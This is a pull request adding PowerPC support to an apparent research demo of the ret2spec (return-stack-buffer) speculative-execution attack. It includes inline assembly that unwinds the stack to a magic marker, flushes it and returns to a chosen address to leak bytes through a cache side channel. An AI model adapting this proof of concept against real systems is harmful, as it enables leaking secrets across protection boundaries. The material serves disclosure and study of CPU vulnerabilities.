### PR TITLE
Ret2spec on PowerPC using call-ret disparity.

### DIFF
--- a/demos/CMakeLists.txt
+++ b/demos/CMakeLists.txt
@@ -109,8 +109,7 @@ add_demo(spectre_v1_btb_ca SYSTEMS Linux)
 # Ret2Spec -- speculative execution using return stack buffers creating a
 # call-ret disparity by inline assembly
 add_demo(ret2spec_callret_disparity
-         SYSTEMS Linux Darwin
-         PROCESSORS i386 x86_64 aarch64)
+         SYSTEMS Linux Darwin)
 if (TARGET ret2spec_callret_disparity)
   target_compile_options(ret2spec_callret_disparity
                          PRIVATE -fomit-frame-pointer)

--- a/demos/instr.cc
+++ b/demos/instr.cc
@@ -54,7 +54,7 @@ void CLFlush(const void *memory) {
 #endif
 }
 
-#if SAFESIDE_GNUC && !SAFESIDE_PPC
+#if SAFESIDE_GNUC
 SAFESIDE_NEVER_INLINE
 void UnwindStackAndSlowlyReturnTo(const void *address) {
 #if SAFESIDE_X64

--- a/demos/instr.cc
+++ b/demos/instr.cc
@@ -99,6 +99,25 @@ void UnwindStackAndSlowlyReturnTo(const void *address) {
       // Having an ISB instruction on this place breaks the attack on Cavium.
       "ldr x30, [sp], #16\n"
       "ret\n"::"r"(address));
+#elif SAFESIDE_PPC
+  asm volatile(
+      // Unwind until the magic value and pop the magic value.
+      "addi 5, 0, 0xfffffffffffffedc\n"
+      "rotldi 5, 5, 16\n"
+      "addi 5, 5, 0xffffffffffffba98\n"
+      "rotldi 5, 5, 16\n"
+      "addi 5, 5, 0x0123\n"
+      "rotldi 5, 5, 16\n"
+      "addi 5, 5, 0x4568\n"
+      "popstack:\n"
+      "ldu 6, 8(1)\n"
+      "cmpd 5, 6\n"
+      "bf eq, popstack\n"
+      // Flush the stack pointer, sync, load to link register and return.
+      "dcbf 0, 1\n"
+      "sync\n"
+      "mtlr %0\n"
+      "blr\n"::"r"(address));
 #else
 #  error Unsupported CPU.
 #endif

--- a/demos/instr.h
+++ b/demos/instr.h
@@ -76,12 +76,14 @@ void UnwindStackAndSlowlyReturnTo(const void *address);
 // addresses (ret2spec) or for skipping failures in signal handlers
 // (meltdown).
 extern char afterspeculation[];
+#endif
 
-#elif SAFESIDE_ARM64
+#if SAFESIDE_ARM64 || SAFESIDE_PPC
 // Push callee-saved registers and return address on stack and mark it with
 // magic value.
 SAFESIDE_ALWAYS_INLINE
 inline void BackupCalleeSavedRegsAndReturnAddress() {
+#if SAFESIDE_ARM64
   asm volatile(
       // Store the callee-saved regs.
       "stp x19, x20, [sp, #-16]!\n"
@@ -96,10 +98,44 @@ inline void BackupCalleeSavedRegsAndReturnAddress() {
       "movk x10, 0xba98, lsl 32\n"
       "movk x10, 0xfedc, lsl 48\n"
       "str x10, [sp, #-16]!\n");
+#elif SAFESIDE_PPC
+  asm volatile(
+      // Store the callee-saved regs.
+      "stdu 14, -8(1)\n"
+      "stdu 15, -8(1)\n"
+      "stdu 16, -8(1)\n"
+      "stdu 17, -8(1)\n"
+      "stdu 18, -8(1)\n"
+      "stdu 19, -8(1)\n"
+      "stdu 20, -8(1)\n"
+      "stdu 21, -8(1)\n"
+      "stdu 22, -8(1)\n"
+      "stdu 23, -8(1)\n"
+      "stdu 24, -8(1)\n"
+      "stdu 25, -8(1)\n"
+      "stdu 26, -8(1)\n"
+      "stdu 27, -8(1)\n"
+      "stdu 28, -8(1)\n"
+      "stdu 29, -8(1)\n"
+      "stdu 30, -8(1)\n"
+      "stdu 31, -8(1)\n"
+      // Mark the end of the backup with magic value 0xfedcba9801234567.
+      "addi 9, 0, 0xfffffffffffffedc\n"
+      "rotldi 9, 9, 16\n"
+      "addi 9, 9, 0xffffffffffffba98\n"
+      "rotldi 9, 9, 16\n"
+      "addi 9, 9, 0x0123\n"
+      "rotldi 9, 9, 16\n"
+      "addi 9, 9, 0x4568\n"
+      "stdu 9, -8(1)\n");
+#else
+#  error Unsupported architecture.
+#endif
 }
 
 SAFESIDE_ALWAYS_INLINE
 inline void RestoreCalleeSavedRegs() {
+#if SAFESIDE_ARM64
   asm volatile(
       "ldr x29, [sp], #16\n"
       "ldp x27, x28, [sp], #16\n"
@@ -107,8 +143,35 @@ inline void RestoreCalleeSavedRegs() {
       "ldp x23, x24, [sp], #16\n"
       "ldp x21, x22, [sp], #16\n"
       "ldp x19, x20, [sp], #16\n");
+#elif SAFESIDE_PPC
+  asm volatile(
+      "ldu 31, 8(1)\n"
+      "ldu 30, 8(1)\n"
+      "ldu 29, 8(1)\n"
+      "ldu 28, 8(1)\n"
+      "ldu 27, 8(1)\n"
+      "ldu 26, 8(1)\n"
+      "ldu 25, 8(1)\n"
+      "ldu 24, 8(1)\n"
+      "ldu 23, 8(1)\n"
+      "ldu 22, 8(1)\n"
+      "ldu 21, 8(1)\n"
+      "ldu 20, 8(1)\n"
+      "ldu 19, 8(1)\n"
+      "ldu 18, 8(1)\n"
+      "ldu 17, 8(1)\n"
+      "ldu 16, 8(1)\n"
+      "ldu 15, 8(1)\n"
+      "ldu 14, 8(1)\n"
+      // Dummy load.
+      "ldu 0, 8(1)\n");
+#else
+#  error Unsupported architecture.
+#endif
 }
+#endif
 
+#if SAFESIDE_ARM64
 // This way we avoid the global vs. local relocation of the afterspeculation
 // label addressing.
 SAFESIDE_ALWAYS_INLINE

--- a/demos/ret2spec_callret_disparity.cc
+++ b/demos/ret2spec_callret_disparity.cc
@@ -73,9 +73,10 @@ static char LeakByte() {
   for (int run = 0;; ++run) {
     sidechannel.FlushOracle();
 
-#if SAFESIDE_ARM64
-    // On ARM we have to manually backup registers that are callee-saved,
-    // because the "speculation" method will never restore their backups.
+#if SAFESIDE_ARM64 || SAFESIDE_PPC
+    // On ARM and PowerPC we have to manually backup registers that are
+    // callee-saved, because the "speculation" method will never restore their
+    // backups.
     BackupCalleeSavedRegsAndReturnAddress();
 #endif
 
@@ -88,7 +89,7 @@ static char LeakByte() {
         "_afterspeculation:\n" // For MacOS.
         "afterspeculation:\n"); // For Linux.
 
-#if SAFESIDE_ARM64
+#if SAFESIDE_ARM64 || SAFESIDE_PPC
     RestoreCalleeSavedRegs();
 #endif
 

--- a/demos/ret2spec_callret_disparity.cc
+++ b/demos/ret2spec_callret_disparity.cc
@@ -40,7 +40,7 @@ void ReturnHandler() {
 // never executing the code that follows.
 SAFESIDE_NEVER_INLINE
 static void Speculation() {
-#if SAFESIDE_X64 || SAFESIDE_IA32
+#if SAFESIDE_X64 || SAFESIDE_IA32 || SAFESIDE_PPC
   const void *return_address = afterspeculation;
 #elif SAFESIDE_ARM64
   const void *return_address = reinterpret_cast<const void *>(ReturnHandler);


### PR DESCRIPTION
The disclosure embargo was just lifted:
https://www.openwall.com/lists/oss-security/2019/11/27/1
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=39e72bf96f5847ba87cc5bd7a3ce0fed813dc9ad